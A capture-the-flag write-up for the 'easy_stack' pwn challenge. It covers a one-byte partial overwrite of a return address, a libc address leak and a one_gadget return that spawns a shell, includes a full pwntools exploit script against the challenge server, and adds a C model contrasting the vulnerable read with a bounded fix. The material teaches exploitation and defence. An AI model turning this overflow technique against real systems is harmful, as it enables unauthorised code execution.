xm_pwn notes

easy_stack:

partial write + one_gadget
The libc is repackaged, so the binary cannot be patched to it locally.
Debugging locally without patching shows that rsp+0x18 holds the address of main.
So we overwrite only the low byte of main's saved return address with \x80,
which redirects execution to the gadget
mov rax, qword ptr [rsp + 0x18]; call rax;
This returns to main once more and at the same time leaks a libc address.
Finally, return into one_gadget.
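The write-up never shows the challenge source, but the offsets it uses (0x88 bytes of filler, then one byte into the saved return address) imply an 0x80-byte stack buffer followed by the saved rbp and the return address. The C below is an added illustration, not the challenge's code: it models that layout to show which input lengths reach the return address, and puts a bounded read beside it as the fix. BUF_SIZE, RET_OFFSET and both function names are assumptions for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the layout the write-up implies (not the real binary):
 * an 0x80-byte buffer, 8 bytes of saved rbp, then the saved return address,
 * so the return address starts at offset 0x88 from the buffer. */
#define BUF_SIZE   0x80
#define RET_OFFSET (BUF_SIZE + 8)

/* For an unbounded copy of input_len bytes into the buffer, report how many
 * bytes of the saved return address get clobbered (0 = return address intact).
 * input_len == 0x89 is exactly the "partial write": only the low byte changes. */
size_t ret_bytes_clobbered(size_t input_len) {
    if (input_len <= RET_OFFSET)
        return 0;
    size_t over = input_len - RET_OFFSET;
    return over > 8 ? 8 : over;
}

/* Vulnerable shape (shown for comparison only, never executed here): the read
 * length is independent of the destination size, so a long line walks over
 * the saved rbp and the return address.
 *
 *   char buf[BUF_SIZE];
 *   read(0, buf, 0x100);
 */

/* Hardened reader: stores at most dst_size-1 bytes of src and always
 * NUL-terminates, so the saved frame data behind the buffer is never touched.
 * Returns the number of payload bytes actually stored. */
size_t read_bounded(char *dst, size_t dst_size, const char *src, size_t src_len) {
    if (dst_size == 0)
        return 0;
    size_t n = src_len < dst_size - 1 ? src_len : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}

int main(void) {
    char dst[BUF_SIZE];
    char payload[0x89];                 /* constructed: same length as cyclic(0x88) + 1 byte */
    memset(payload, 'a', sizeof payload);

    printf("%zu-byte input clobbers %zu return-address byte(s) in the unbounded version\n",
           sizeof payload, ret_bytes_clobbered(sizeof payload));
    printf("bounded read stored %zu bytes and left the frame intact\n",
           read_bounded(dst, sizeof dst, payload, sizeof payload));
    return 0;
}
```

The point of the comparison is that the partial overwrite in the write-up needs only one byte past offset 0x88; any read whose length is not tied to the buffer size gives that byte away, while the bounded variant caps the copy at dst_size-1 regardless of how long the input is.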

from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])

# io=process("./easy_stack")
io=remote("nc.eonew.cn",10004)
elf=ELF("./easy_stack")
libc=ELF("./libc-2.27.so")
# gdb.attach(io)
# pause()

# 0x88 bytes of filler, then overwrite only the low byte of the saved return address
# so it lands on: mov rax, qword ptr [rsp + 0x18]; call rax;  (rsp+0x18 holds main)
payload=cyclic(0x88)+b"\x80"
io.sendline(payload)

# the leaked value ends in 0x7f; subtract its offset to get the libc base
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x21a80
print("leak_addr: " + hex(leak_addr))

# one_gadget offset in this libc (constraint: rax == NULL, see below)
shell=leak_addr+0x415a6

# second run of main: overwrite the full return address with the one_gadget
payload=b"a"*0x88+p64(shell)
io.sendline(payload)

sleep(1)

io.interactive()
# 0x415a6 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x415fa execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xdfa51 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL